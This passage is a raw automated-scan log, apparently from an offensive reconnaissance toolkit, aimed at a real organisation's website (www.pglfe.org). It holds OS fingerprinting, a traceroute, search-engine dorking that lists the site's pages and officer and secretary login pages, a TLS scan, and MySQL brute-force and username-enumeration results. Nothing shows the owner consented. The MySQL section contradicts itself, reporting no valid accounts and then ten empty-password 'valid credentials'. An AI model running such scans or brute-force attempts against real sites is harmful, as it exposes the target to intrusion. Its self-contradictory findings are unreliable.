9906| [674] Apache Tomcat Nonexistent File Error Message Path Disclosure
9907| [637] Apache HTTP Server UserDir Directive Username Enumeration
9908| [623] mod_auth_pgsql for Apache HTTP Server User Name SQL Injection
9909| [582] Apache HTTP Server Multiviews Feature Arbitrary Directory Listing
9910| [562] Apache HTTP Server mod_info /server-info Information Disclosure
9911| [561] Apache Web Servers mod_status /server-status Information Disclosure
9912| [417] Apache HTTP Server on SuSE Linux /doc/packages Remote Information Disclosure
9913| [410] mod_perl for Apache HTTP Server /perl/ Directory Listing
9914| [404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
9915| [402] Apache HTTP Server on SuSE Linux cgi-bin-sdb Request Script Source Disclosure
9916| [379] Apache ASP module Apache::ASP source.asp Example File Arbitrary File Creation
9917| [377] Apache Tomcat Snoop Servlet Remote Information Disclosure
9918| [376] Apache Tomcat contextAdmin Arbitrary File Access
9919| [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing
9920| [222] Apache HTTP Server test-cgi Arbitrary File Access
9921| [143] Apache HTTP Server printenv.pl Multiple Method CGI XSS
9922| [48] Apache HTTP Server on Debian /usr/doc Directory Information Disclosure
9923|_
9924Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
9925Device type: general purpose
9926Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (91%)
9927OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4.4 cpe:/o:linux:linux_kernel:2.6
9928Aggressive OS guesses: Linux 3.10 - 3.12 (91%), Linux 4.4 (91%), Linux 4.9 (91%), Linux 2.6.18 - 2.6.22 (86%), Linux 3.10 (86%), Linux 4.0 (86%), Linux 3.10 - 4.11 (85%), Linux 3.11 - 4.1 (85%), Linux 3.18 (85%), Linux 3.2 - 4.9 (85%)
9929No exact OS matches for host (test conditions non-ideal).
9930Uptime guess: 25.968 days (since Wed Oct 30 10:20:01 2019)
9931Network Distance: 17 hops
9932TCP Sequence Prediction: Difficulty=257 (Good luck!)
9933IP ID Sequence Generation: All zeros
9934
9935TRACEROUTE (using port 80/tcp)
9936HOP RTT ADDRESS
99371 133.32 ms 10.245.200.1
99382 ...
99393 130.82 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
99404 130.77 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
99415 135.95 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
99426 158.76 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
99437 166.52 ms be2797.ccr41.fra03.atlas.cogentco.com (154.54.58.225)
99448 162.98 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
99459 165.97 ms centurylink.fra03.atlas.cogentco.com (130.117.14.26)
994610 163.92 ms 63-235-41-102.dia.static.qwest.net (63.235.41.102)
994711 252.03 ms cr1-te-0-5-1-0.ft3.savvis.net (204.70.224.158)
994812 261.11 ms 204.70.192.125
994913 247.17 ms cr2-xe-4-0-2.jfk2.savvis.net (206.28.101.9)
995014 250.95 ms msr1-te-0-3-0-0.bos.savvis.net (206.28.97.205)
995115 247.81 ms hr3-xe-8-0.0.bo3.savvis.net (206.28.97.198)
995216 249.01 ms 64.89.38.2
995317 250.59 ms 192.252.144.58
9954
9955NSE: Script Post-scanning.
9956Initiating NSE at 08:33
9957Completed NSE at 08:33, 0.00s elapsed
9958Initiating NSE at 08:33
9959Completed NSE at 08:33, 0.00s elapsed
9960#######################################################################################################################################
9961------------------------------------------------------------------------------------------------------------------------
9962
9963[ ! ] Starting SCANNER INURLBR 2.1 at [25-11-2019 08:33:45]
9964[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
9965It is the end user's responsibility to obey all applicable local, state and federal laws.
9966Developers assume no liability and are not responsible for any misuse or damage caused by this program
9967
9968[ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.pglfe.org/output/inurlbr-www.pglfe.org ]
9969[ INFO ][ DORK ]::[ site:www.pglfe.org ]
9970[ INFO ][ SEARCHING ]:: {
9971[ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.kh ]
9972
9973[ INFO ][ SEARCHING ]::
9974-[:::]
9975[ INFO ][ ENGINE ]::[ GOOGLE API ]
9976
9977[ INFO ][ SEARCHING ]::
9978-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
9979[ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.no ID: 003917828085772992913:gmoeray5sa8 ]
9980
9981[ INFO ][ SEARCHING ]::
9982-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
9983
9984[ INFO ][ TOTAL FOUND VALUES ]:: [ 20 ]
9985
9986
9987 _[ - ]::--------------------------------------------------------------------------------------------------------------
9988|_[ + ] [ 0 / 20 ]-[08:34:03] [ - ]
9989|_[ + ] Target:: [ http://www.pglfe.org/stdavid903.php ]
9990|_[ + ] Exploit::
9991|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
9992|_[ + ] More details:: / - / , ISP:
9993|_[ + ] Found:: UNIDENTIFIED
9994
9995 _[ - ]::--------------------------------------------------------------------------------------------------------------
9996|_[ + ] [ 1 / 20 ]-[08:34:05] [ - ]
9997|_[ + ] Target:: [ http://www.pglfe.org/erin463.php ]
9998|_[ + ] Exploit::
9999|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10000|_[ + ] More details:: / - / , ISP:
10001|_[ + ] Found:: UNIDENTIFIED
10002
10003 _[ - ]::--------------------------------------------------------------------------------------------------------------
10004|_[ + ] [ 2 / 20 ]-[08:34:07] [ - ]
10005|_[ + ] Target:: [ http://www.pglfe.org/bauhiniarac322.php ]
10006|_[ + ] Exploit::
10007|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10008|_[ + ] More details:: / - / , ISP:
10009|_[ + ] Found:: UNIDENTIFIED
10010
10011 _[ - ]::--------------------------------------------------------------------------------------------------------------
10012|_[ + ] [ 3 / 20 ]-[08:34:09] [ - ]
10013|_[ + ] Target:: [ http://www.pglfe.org/shamrock712.php ]
10014|_[ + ] Exploit::
10015|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10016|_[ + ] More details:: / - / , ISP:
10017|_[ + ] Found:: UNIDENTIFIED
10018
10019 _[ - ]::--------------------------------------------------------------------------------------------------------------
10020|_[ + ] [ 4 / 20 ]-[08:34:11] [ - ]
10021|_[ + ] Target:: [ http://www.pglfe.org/sinolusitano897.php ]
10022|_[ + ] Exploit::
10023|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10024|_[ + ] More details:: / - / , ISP:
10025|_[ + ] Found:: UNIDENTIFIED
10026
10027 _[ - ]::--------------------------------------------------------------------------------------------------------------
10028|_[ + ] [ 5 / 20 ]-[08:34:13] [ - ]
10029|_[ + ] Target:: [ http://www.pglfe.org/installedmasters1001.php ]
10030|_[ + ] Exploit::
10031|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10032|_[ + ] More details:: / - / , ISP:
10033|_[ + ] Found:: UNIDENTIFIED
10034
10035 _[ - ]::--------------------------------------------------------------------------------------------------------------
10036|_[ + ] [ 6 / 20 ]-[08:34:15] [ - ]
10037|_[ + ] Target:: [ http://www.pglfe.org/emerald883.php ]
10038|_[ + ] Exploit::
10039|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10040|_[ + ] More details:: / - / , ISP:
10041|_[ + ] Found:: UNIDENTIFIED
10042
10043 _[ - ]::--------------------------------------------------------------------------------------------------------------
10044|_[ + ] [ 7 / 20 ]-[08:34:17] [ - ]
10045|_[ + ] Target:: [ http://www.pglfe.org/pglfe_lodges.php ]
10046|_[ + ] Exploit::
10047|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10048|_[ + ] More details:: / - / , ISP:
10049|_[ + ] Found:: UNIDENTIFIED
10050
10051 _[ - ]::--------------------------------------------------------------------------------------------------------------
10052|_[ + ] [ 8 / 20 ]-[08:34:19] [ - ]
10053|_[ + ] Target:: [ http://www.pglfe.org/hamiltonkm67.php ]
10054|_[ + ] Exploit::
10055|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10056|_[ + ] More details:: / - / , ISP:
10057|_[ + ] Found:: UNIDENTIFIED
10058
10059 _[ - ]::--------------------------------------------------------------------------------------------------------------
10060|_[ + ] [ 9 / 20 ]-[08:34:21] [ - ]
10061|_[ + ] Target:: [ http://www.pglfe.org/badenpowell929.php ]
10062|_[ + ] Exploit::
10063|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10064|_[ + ] More details:: / - / , ISP:
10065|_[ + ] Found:: UNIDENTIFIED
10066
10067 _[ - ]::--------------------------------------------------------------------------------------------------------------
10068|_[ + ] [ 10 / 20 ]-[08:34:22] [ - ]
10069|_[ + ] Target:: [ http://www.pglfe.org/pglfe_chapter_km.php ]
10070|_[ + ] Exploit::
10071|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10072|_[ + ] More details:: / - / , ISP:
10073|_[ + ] Found:: UNIDENTIFIED
10074
10075 _[ - ]::--------------------------------------------------------------------------------------------------------------
10076|_[ + ] [ 11 / 20 ]-[08:34:24] [ - ]
10077|_[ + ] Target:: [ http://www.pglfe.org/badenpowellrac929.php ]
10078|_[ + ] Exploit::
10079|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10080|_[ + ] More details:: / - / , ISP:
10081|_[ + ] Found:: UNIDENTIFIED
10082
10083 _[ - ]::--------------------------------------------------------------------------------------------------------------
10084|_[ + ] [ 12 / 20 ]-[08:34:26] [ - ]
10085|_[ + ] Target:: [ http://www.pglfe.org/contact.php ]
10086|_[ + ] Exploit::
10087|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10088|_[ + ] More details:: / - / , ISP:
10089|_[ + ] Found:: UNIDENTIFIED
10090
10091 _[ - ]::--------------------------------------------------------------------------------------------------------------
10092|_[ + ] [ 13 / 20 ]-[08:34:28] [ - ]
10093|_[ + ] Target:: [ http://www.pglfe.org/pglfe-officers.php ]
10094|_[ + ] Exploit::
10095|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10096|_[ + ] More details:: / - / , ISP:
10097|_[ + ] Found:: UNIDENTIFIED
10098
10099 _[ - ]::--------------------------------------------------------------------------------------------------------------
10100|_[ + ] [ 14 / 20 ]-[08:34:29] [ - ]
10101|_[ + ] Target:: [ http://www.pglfe.org/dgracfe_doc/doc_login.php ]
10102|_[ + ] Exploit::
10103|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10104|_[ + ] More details:: / - / , ISP:
10105|_[ + ] Found:: UNIDENTIFIED
10106
10107 _[ - ]::--------------------------------------------------------------------------------------------------------------
10108|_[ + ] [ 15 / 20 ]-[08:34:31] [ - ]
10109|_[ + ] Target:: [ http://www.pglfe.org/pglfe_doc/doc_login.php ]
10110|_[ + ] Exploit::
10111|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10112|_[ + ] More details:: / - / , ISP:
10113|_[ + ] Found:: UNIDENTIFIED
10114
10115 _[ - ]::--------------------------------------------------------------------------------------------------------------
10116|_[ + ] [ 16 / 20 ]-[08:34:33] [ - ]
10117|_[ + ] Target:: [ http://www.pglfe.org/pglfe_sec/secretary_login.php ]
10118|_[ + ] Exploit::
10119|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10120|_[ + ] More details:: / - / , ISP:
10121|_[ + ] Found:: UNIDENTIFIED
10122
10123 _[ - ]::--------------------------------------------------------------------------------------------------------------
10124|_[ + ] [ 17 / 20 ]-[08:34:35] [ - ]
10125|_[ + ] Target:: [ http://www.pglfe.org/pglfe_officers/officer_login.php ]
10126|_[ + ] Exploit::
10127|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10128|_[ + ] More details:: / - / , ISP:
10129|_[ + ] Found:: UNIDENTIFIED
10130
10131 _[ - ]::--------------------------------------------------------------------------------------------------------------
10132|_[ + ] [ 18 / 20 ]-[08:34:36] [ - ]
10133|_[ + ] Target:: [ http://www.pglfe.org/pglfe_calendar2019.php ]
10134|_[ + ] Exploit::
10135|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10136|_[ + ] More details:: / - / , ISP:
10137|_[ + ] Found:: UNIDENTIFIED
10138
10139 _[ - ]::--------------------------------------------------------------------------------------------------------------
10140|_[ + ] [ 19 / 20 ]-[08:34:38] [ - ]
10141|_[ + ] Target:: [ http://www.pglfe.org/gli_officers_hk.php ]
10142|_[ + ] Exploit::
10143|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10144|_[ + ] More details:: / - / , ISP:
10145|_[ + ] Found:: UNIDENTIFIED
10146
10147[ INFO ] [ Shutting down ]
10148[ INFO ] [ End of process INURLBR at [25-11-2019 08:34:38]
10149[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
10150[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.pglfe.org/output/inurlbr-www.pglfe.org ]
10151|_________________________________________________________________________________________
10152
10153\_________________________________________________________________________________________/
10154######################################################################################################################################
10155https://www.pglfe.org [200 OK] Apache, Cookies[pglfesesid], Country[UNITED STATES][US], HTTPServer[Apache], IP[192.252.144.58], JQuery, Script[text/javascript], maybe Sophos-Email-Appliance, Title[Provincial Grand Lodge of the Far East], UncommonHeaders[upgrade]
10156######################################################################################################################################
10157Version: 1.11.13-static
10158OpenSSL 1.0.2-chacha (1.0.2g-dev)
10159
10160Connected to 192.252.144.58
10161
10162Testing SSL server www.pglfe.org on port 443 using SNI name www.pglfe.org
10163
10164 TLS Fallback SCSV:
10165Server supports TLS Fallback SCSV
10166
10167 TLS renegotiation:
10168Session renegotiation not supported
10169
10170 TLS Compression:
10171Compression disabled
10172
10173 Heartbleed:
10174TLS 1.2 not vulnerable to heartbleed
10175TLS 1.1 not vulnerable to heartbleed
10176TLS 1.0 not vulnerable to heartbleed
10177
10178 Supported Server Cipher(s):
10179Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
10180Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
10181Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
10182Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
10183Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
10184Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
10185Accepted TLSv1.2 256 bits AES256-GCM-SHA384
10186Accepted TLSv1.2 256 bits AES256-SHA256
10187Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
10188Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
10189Accepted TLSv1.2 128 bits AES128-GCM-SHA256
10190Accepted TLSv1.2 128 bits AES128-SHA256
10191Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
10192Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
10193Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
10194Accepted TLSv1.2 256 bits AES256-SHA
10195Accepted TLSv1.2 256 bits CAMELLIA256-SHA
10196Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
10197Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
10198Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
10199Accepted TLSv1.2 128 bits AES128-SHA
10200Accepted TLSv1.2 128 bits CAMELLIA128-SHA
10201
10202 SSL Certificate:
10203Signature Algorithm: sha256WithRSAEncryption
10204RSA Key Strength: 2048
10205
10206Subject: www.server279.com
10207Altnames: DNS:server279.com, DNS:www.server279.com
10208Issuer: Let's Encrypt Authority X3
10209
10210Not valid before: Sep 22 05:35:52 2019 GMT
10211Not valid after: Dec 21 05:35:52 2019 GMT
10212######################################################################################################################################
10213------------------------------------------------------------------------------------------------------------------------
10214
10215[ ! ] Starting SCANNER INURLBR 2.1 at [25-11-2019 08:36:45]
10216[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
10217It is the end user's responsibility to obey all applicable local, state and federal laws.
10218Developers assume no liability and are not responsible for any misuse or damage caused by this program
10219
10220[ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.pglfe.org/output/inurlbr-www.pglfe.org ]
10221[ INFO ][ DORK ]::[ site:www.pglfe.org ]
10222[ INFO ][ SEARCHING ]:: {
10223[ INFO ][ ENGINE ]::[ GOOGLE - www.google.co.ve ]
10224
10225[ INFO ][ SEARCHING ]::
10226-[:::]
10227[ INFO ][ ENGINE ]::[ GOOGLE API ]
10228
10229[ INFO ][ SEARCHING ]::
10230-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
10231[ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.kg ID: 013269018370076798483:wdba3dlnxqm ]
10232
10233[ INFO ][ SEARCHING ]::
10234-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
10235
10236[ INFO ][ TOTAL FOUND VALUES ]:: [ 20 ]
10237
10238
10239 _[ - ]::--------------------------------------------------------------------------------------------------------------
10240|_[ + ] [ 0 / 20 ]-[08:37:04] [ - ]
10241|_[ + ] Target:: [ http://www.pglfe.org/stdavid903.php ]
10242|_[ + ] Exploit::
10243|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10244|_[ + ] More details:: / - / , ISP:
10245|_[ + ] Found:: UNIDENTIFIED
10246
10247 _[ - ]::--------------------------------------------------------------------------------------------------------------
10248|_[ + ] [ 1 / 20 ]-[08:37:06] [ - ]
10249|_[ + ] Target:: [ http://www.pglfe.org/erin463.php ]
10250|_[ + ] Exploit::
10251|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10252|_[ + ] More details:: / - / , ISP:
10253|_[ + ] Found:: UNIDENTIFIED
10254
10255 _[ - ]::--------------------------------------------------------------------------------------------------------------
10256|_[ + ] [ 2 / 20 ]-[08:37:08] [ - ]
10257|_[ + ] Target:: [ http://www.pglfe.org/bauhiniarac322.php ]
10258|_[ + ] Exploit::
10259|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10260|_[ + ] More details:: / - / , ISP:
10261|_[ + ] Found:: UNIDENTIFIED
10262
10263 _[ - ]::--------------------------------------------------------------------------------------------------------------
10264|_[ + ] [ 3 / 20 ]-[08:37:10] [ - ]
10265|_[ + ] Target:: [ http://www.pglfe.org/shamrock712.php ]
10266|_[ + ] Exploit::
10267|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10268|_[ + ] More details:: / - / , ISP:
10269|_[ + ] Found:: UNIDENTIFIED
10270
10271 _[ - ]::--------------------------------------------------------------------------------------------------------------
10272|_[ + ] [ 4 / 20 ]-[08:37:12] [ - ]
10273|_[ + ] Target:: [ http://www.pglfe.org/sinolusitano897.php ]
10274|_[ + ] Exploit::
10275|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10276|_[ + ] More details:: / - / , ISP:
10277|_[ + ] Found:: UNIDENTIFIED
10278
10279 _[ - ]::--------------------------------------------------------------------------------------------------------------
10280|_[ + ] [ 5 / 20 ]-[08:37:14] [ - ]
10281|_[ + ] Target:: [ http://www.pglfe.org/installedmasters1001.php ]
10282|_[ + ] Exploit::
10283|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10284|_[ + ] More details:: / - / , ISP:
10285|_[ + ] Found:: UNIDENTIFIED
10286
10287 _[ - ]::--------------------------------------------------------------------------------------------------------------
10288|_[ + ] [ 6 / 20 ]-[08:37:15] [ - ]
10289|_[ + ] Target:: [ http://www.pglfe.org/emerald883.php ]
10290|_[ + ] Exploit::
10291|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10292|_[ + ] More details:: / - / , ISP:
10293|_[ + ] Found:: UNIDENTIFIED
10294
10295 _[ - ]::--------------------------------------------------------------------------------------------------------------
10296|_[ + ] [ 7 / 20 ]-[08:37:17] [ - ]
10297|_[ + ] Target:: [ http://www.pglfe.org/pglfe_lodges.php ]
10298|_[ + ] Exploit::
10299|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10300|_[ + ] More details:: / - / , ISP:
10301|_[ + ] Found:: UNIDENTIFIED
10302
10303 _[ - ]::--------------------------------------------------------------------------------------------------------------
10304|_[ + ] [ 8 / 20 ]-[08:37:19] [ - ]
10305|_[ + ] Target:: [ http://www.pglfe.org/hamiltonkm67.php ]
10306|_[ + ] Exploit::
10307|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10308|_[ + ] More details:: / - / , ISP:
10309|_[ + ] Found:: UNIDENTIFIED
10310
10311 _[ - ]::--------------------------------------------------------------------------------------------------------------
10312|_[ + ] [ 9 / 20 ]-[08:37:21] [ - ]
10313|_[ + ] Target:: [ http://www.pglfe.org/badenpowell929.php ]
10314|_[ + ] Exploit::
10315|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10316|_[ + ] More details:: / - / , ISP:
10317|_[ + ] Found:: UNIDENTIFIED
10318
10319 _[ - ]::--------------------------------------------------------------------------------------------------------------
10320|_[ + ] [ 10 / 20 ]-[08:37:23] [ - ]
10321|_[ + ] Target:: [ http://www.pglfe.org/pglfe_chapter_km.php ]
10322|_[ + ] Exploit::
10323|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10324|_[ + ] More details:: / - / , ISP:
10325|_[ + ] Found:: UNIDENTIFIED
10326
10327 _[ - ]::--------------------------------------------------------------------------------------------------------------
10328|_[ + ] [ 11 / 20 ]-[08:37:25] [ - ]
10329|_[ + ] Target:: [ http://www.pglfe.org/badenpowellrac929.php ]
10330|_[ + ] Exploit::
10331|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10332|_[ + ] More details:: / - / , ISP:
10333|_[ + ] Found:: UNIDENTIFIED
10334
10335 _[ - ]::--------------------------------------------------------------------------------------------------------------
10336|_[ + ] [ 12 / 20 ]-[08:37:26] [ - ]
10337|_[ + ] Target:: [ http://www.pglfe.org/contact.php ]
10338|_[ + ] Exploit::
10339|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10340|_[ + ] More details:: / - / , ISP:
10341|_[ + ] Found:: UNIDENTIFIED
10342
10343 _[ - ]::--------------------------------------------------------------------------------------------------------------
10344|_[ + ] [ 13 / 20 ]-[08:37:28] [ - ]
10345|_[ + ] Target:: [ http://www.pglfe.org/pglfe-officers.php ]
10346|_[ + ] Exploit::
10347|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10348|_[ + ] More details:: / - / , ISP:
10349|_[ + ] Found:: UNIDENTIFIED
10350
10351 _[ - ]::--------------------------------------------------------------------------------------------------------------
10352|_[ + ] [ 14 / 20 ]-[08:37:30] [ - ]
10353|_[ + ] Target:: [ http://www.pglfe.org/dgracfe_doc/doc_login.php ]
10354|_[ + ] Exploit::
10355|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10356|_[ + ] More details:: / - / , ISP:
10357|_[ + ] Found:: UNIDENTIFIED
10358
10359 _[ - ]::--------------------------------------------------------------------------------------------------------------
10360|_[ + ] [ 15 / 20 ]-[08:37:32] [ - ]
10361|_[ + ] Target:: [ http://www.pglfe.org/pglfe_doc/doc_login.php ]
10362|_[ + ] Exploit::
10363|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10364|_[ + ] More details:: / - / , ISP:
10365|_[ + ] Found:: UNIDENTIFIED
10366
10367 _[ - ]::--------------------------------------------------------------------------------------------------------------
10368|_[ + ] [ 16 / 20 ]-[08:37:33] [ - ]
10369|_[ + ] Target:: [ http://www.pglfe.org/pglfe_sec/secretary_login.php ]
10370|_[ + ] Exploit::
10371|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10372|_[ + ] More details:: / - / , ISP:
10373|_[ + ] Found:: UNIDENTIFIED
10374
10375 _[ - ]::--------------------------------------------------------------------------------------------------------------
10376|_[ + ] [ 17 / 20 ]-[08:37:35] [ - ]
10377|_[ + ] Target:: [ http://www.pglfe.org/pglfe_officers/officer_login.php ]
10378|_[ + ] Exploit::
10379|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10380|_[ + ] More details:: / - / , ISP:
10381|_[ + ] Found:: UNIDENTIFIED
10382
10383 _[ - ]::--------------------------------------------------------------------------------------------------------------
10384|_[ + ] [ 18 / 20 ]-[08:37:37] [ - ]
10385|_[ + ] Target:: [ http://www.pglfe.org/pglfe_calendar2019.php ]
10386|_[ + ] Exploit::
10387|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10388|_[ + ] More details:: / - / , ISP:
10389|_[ + ] Found:: UNIDENTIFIED
10390
10391 _[ - ]::--------------------------------------------------------------------------------------------------------------
10392|_[ + ] [ 19 / 20 ]-[08:37:39] [ - ]
10393|_[ + ] Target:: [ http://www.pglfe.org/gli_officers_hk.php ]
10394|_[ + ] Exploit::
10395|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10396|_[ + ] More details:: / - / , ISP:
10397|_[ + ] Found:: UNIDENTIFIED
10398
10399[ INFO ] [ Shutting down ]
10400[ INFO ] [ End of process INURLBR at [25-11-2019 08:37:39]
10401[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
10402[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.pglfe.org/output/inurlbr-www.pglfe.org ]
10403|_________________________________________________________________________________________
10404
10405\_________________________________________________________________________________________/
10406#######################################################################################################################################
10407tee: /usr/share/sniper/loot/workspace/www.pglfe.org/output/nmap-www.pglfe.org-port3306.txt: Aucun fichier ou dossier de ce type
10408Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:37 EST
10409Nmap scan report for www.pglfe.org (192.252.144.58)
10410Host is up (0.25s latency).
10411
10412PORT STATE SERVICE VERSION
104133306/tcp open mysql MySQL 5.7.23-percona-sure1-log
10414| mysql-brute:
10415| Accounts: No valid accounts found
10416| Statistics: Performed 188 guesses in 173 seconds, average tps: 1.2
10417|_ ERROR: The service seems to have failed or is heavily firewalled...
10418| mysql-enum:
10419| Valid usernames:
10420| root:<empty> - Valid credentials
10421| web:<empty> - Valid credentials
10422| netadmin:<empty> - Valid credentials
10423| guest:<empty> - Valid credentials
10424| user:<empty> - Valid credentials
10425| sysadmin:<empty> - Valid credentials
10426| administrator:<empty> - Valid credentials
10427| webadmin:<empty> - Valid credentials
10428| admin:<empty> - Valid credentials
10429| test:<empty> - Valid credentials
10430|_ Statistics: Performed 10 guesses in 2 seconds, average tps: 5.0
10431| mysql-info:
10432| Protocol: 10
10433| Version: 5.7.23-percona-sure1-log
10434| Thread ID: 5789630
10435| Capabilities flags: 65535
10436| Some Capabilities: LongColumnFlag, Support41Auth, Speaks41ProtocolOld, FoundRows, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, LongPassword, SupportsTransactions, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, InteractiveClient, ODBCClient, SupportsLoadDataLocal, SwitchToSSLAfterHandshake, SupportsCompression, ConnectWithDatabase, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
10437| Status: Autocommit
10438| Salt: NI\x13nNN\x12\x01k\x1B\x18\x04/[\x1C%q6Vt
10439|_ Auth Plugin Name: mysql_native_password
10440|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
10441| vulners:
10442| MySQL 5.7.23-percona-sure1-log:
10443|_ NODEJS:602 0.0 https://vulners.com/nodejs/NODEJS:602
10444| vulscan: VulDB - https://vuldb.com:
10445| [138071] Oracle MySQL Server up to 5.7.23 Replication unknown vulnerability
10446| [125567] Oracle MySQL Server up to 5.7.23/8.0.12 Logging denial of service
10447| [125566] Oracle MySQL Server up to 5.7.23/8.0.12 InnoDB denial of service
10448| [125561] Oracle MySQL Server up to 5.7.23/8.0.12 Partition denial of service
10449| [125555] Oracle MySQL Server up to 5.7.23/8.0.12 InnoDB denial of service
10450| [125554] Oracle MySQL Server up to 5.7.23/8.0.12 InnoDB denial of service
